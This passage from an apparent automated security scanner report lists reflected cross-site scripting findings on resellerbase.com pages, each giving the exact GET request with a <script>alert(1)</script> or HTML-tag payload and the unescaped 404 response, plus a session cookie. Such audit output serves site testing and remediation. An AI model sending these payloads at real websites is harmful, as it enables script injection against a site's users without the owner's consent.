Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcd7c0<a>7d95444b141&opt=2 was not found on this server.</p>
...[SNIP]...

2.638. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 458e6<a>b16fc90654b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...458e6<a>b16fc90654b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...458e6<a>b16fc90654b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.639. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 93e84<script>alert(1)</script>4450b3003c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&93e84<script>alert(1)</script>4450b3003c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&93e84<script>alert(1)</script>4450b3003c3=1 was not found on this server.</p>
...[SNIP]...

2.640. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d6232<a>93d3cb0ea93 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6232<a>93d3cb0ea93 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6232<a>93d3cb0ea93 was not found on this server.</p>
...[SNIP]...

2.641. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58385<script>alert(1)</script>bdec5d8e6ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication58385<script>alert(1)</script>bdec5d8e6ef/mobile-content/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication58385<script>alert(1)</script>bdec5d8e6ef/mobile-content/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.642. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89fac<script>alert(1)</script>37e4d735bfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content89fac<script>alert(1)</script>37e4d735bfc/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content89fac<script>alert(1)</script>37e4d735bfc/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.643. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea373<script>alert(1)</script>641dd78b732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesea373<script>alert(1)</script>641dd78b732/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesea373<script>alert(1)</script>641dd78b732/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.644. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 351f5<script>alert(1)</script>d383cc64e0c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos351f5<script>alert(1)</script>d383cc64e0c/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos351f5<script>alert(1)</script>d383cc64e0c/images/review/ was not found on this server.</p>
...[SNIP]...

2.645. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d4e08<script>alert(1)</script>d1974f868c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesd4e08<script>alert(1)</script>d1974f868c1/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesd4e08<script>alert(1)</script>d1974f868c1/review/ was not found on this server.</p>
...[SNIP]...

2.646. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8cc99<script>alert(1)</script>4366bc4e1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review8cc99<script>alert(1)</script>4366bc4e1f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review8cc99<script>alert(1)</script>4366bc4e1f/ was not found on this server.</p>
...[SNIP]...

2.647. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84559<script>alert(1)</script>10020d4d013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/?84559<script>alert(1)</script>10020d4d013=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/?84559<script>alert(1)</script>10020d4d013=1 was not found on this server.</p>
...[SNIP]...

2.648. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c14c<script>alert(1)</script>8f7c7d20359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication1c14c<script>alert(1)</script>8f7c7d20359/mobile-content/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication1c14c<script>alert(1)</script>8f7c7d20359/mobile-content/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.649. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dbefe<script>alert(1)</script>2facc1a8967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentdbefe<script>alert(1)</script>2facc1a8967/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentdbefe<script>alert(1)</script>2facc1a8967/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.650. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 914ae<script>alert(1)</script>0b09a63bc0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes914ae<script>alert(1)</script>0b09a63bc0a/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes914ae<script>alert(1)</script>0b09a63bc0a/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.651. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cdf2<script>alert(1)</script>b047bd1718d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos9cdf2<script>alert(1)</script>b047bd1718d/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos9cdf2<script>alert(1)</script>b047bd1718d/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.652. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e00c1<script>alert(1)</script>767e1491ab8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagese00c1<script>alert(1)</script>767e1491ab8/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagese00c1<script>alert(1)</script>767e1491ab8/review/0.gif was not found on this server.</p>
...[SNIP]...

2.653. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f3a3f<script>alert(1)</script>9ad8eff08e7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/reviewf3a3f<script>alert(1)</script>9ad8eff08e7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/reviewf3a3f<script>alert(1)</script>9ad8eff08e7/0.gif was not found on this server.</p>
...[SNIP]...

2.654. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4a54b<script>alert(1)</script>cf67bf6e0f0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/0.gif4a54b<script>alert(1)</script>cf67bf6e0f0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/0.gif4a54b<script>alert(1)</script>cf67bf6e0f0 was not found on this server.</p>
...[SNIP]...

2.655. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e77f2<script>alert(1)</script>a8d24270aed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/0.gif?e77f2<script>alert(1)</script>a8d24270aed=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/0.gif?e77f2<script>alert(1)</script>a8d24270aed=1 was not found on this server.</p>
...[SNIP]...

2.656. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

